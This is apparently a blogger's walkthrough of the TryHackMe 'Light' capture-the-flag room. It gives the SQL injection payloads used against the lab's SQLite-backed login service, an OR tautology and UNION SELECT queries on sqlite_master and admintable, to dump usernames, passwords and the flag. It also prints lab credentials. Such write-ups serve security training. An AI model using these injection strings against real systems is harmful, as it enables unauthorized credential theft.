TryHackMe Light Walkthrough
Welcome to the Light database application!
Mode:EASY
I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc 10.10.235.64 1337
You can use the username smokey in order to get started.
Room Link: Light THM
Everything seemed fine until the morning after I completed yesterday’s TryHackMe rooms and went to sleep. As the sun rose, I stumbled upon a partially completed writeup by my friend on the “Room Light” challenge on TryHackMe. Intrigued and motivated, I decided to take it on myself.
Setting my aim on capturing the flag, I fired up the machine and began my journey. But this wasn’t an easy challenge — it required precision, the right commands, and a well-constructed syntax to get anywhere.
Initial Discovery
The only thing that worked perfectly was a hint:
nc 10.10.235.64 1337Using the user smokey as username :
gave a password:
vYQ5ngPpw8AdUmLThis clue set the stage for further enumeration.
Enumeration Phase
Running an Nmap scan revealed two open ports:
- 22 (SSH)
- 1337
At this point, I expected a standard workflow — gather data from port 1337, log in via SSH, and perform privilege escalation. However, this machine had its own twists and challenges, deviating from the typical path I anticipated.
Working through various commands and encountering errors eventually led me to discover two columns after some trial and error. The columns contained only username and password—nothing else.
Using the command:
smokey' OR 'a'='arevealed a password:
tF8tj2o94WE4LKCHowever, I wasn’t sure who the password belonged to, so I continued experimenting to find a favorable command.
The real progress began here. After more testing, I discovered a working command:
smokey' UNION SELECT name FROM sqlite_master WHERE type='tableThis revealed a table name. Next, I identified the columns, which were crucial for further progress.
Next, we needed to retrieve the admin username. This was straightforward using the following command:
smokey' UNION SELECT username FROM admintable WHERE username LIKE '%'The next task was to obtain the admin password. For this, the following command was used:
smokey' UNION SELECT password FROM admintable WHERE username = '{adminusername}'
Next, I assumed the discovered credentials would allow SSH login, but that turned out to be incorrect. To dig deeper, I checked for other entries in the username column. It revealed there were only two entries. This was done using the command:
smokey' UNION SELECT COUNT(username) FROM admintable WHERE '1A quick realization struck me: since we already knew one username, applying a condition to exclude that name (!=) would retrieve the password of the other user. Since there was only one remaining entry, I was confident it would lead to the flag. With a simple correction to the previous commands,
the flag was revealed:
smokey' UNION SELECT password FROM admintable WHERE username != '{adminusername}'
Eureka! The room has been solved, and the flag has been captured. While the overall experience was enjoyable, hunting for the correct commands was quite frustrating until I finally found the right approach.
The restrictions and setups made gaining entry to the room slightly challenging.
In the end, this room taught me the value of methodical exploration and the importance of testing different angles when facing unexpected obstacles. It was a rewarding experience that reinforced key concepts in web application security.
good luck with your next challenge! Feel free to reach out whenever you need help. See you next time! 👋
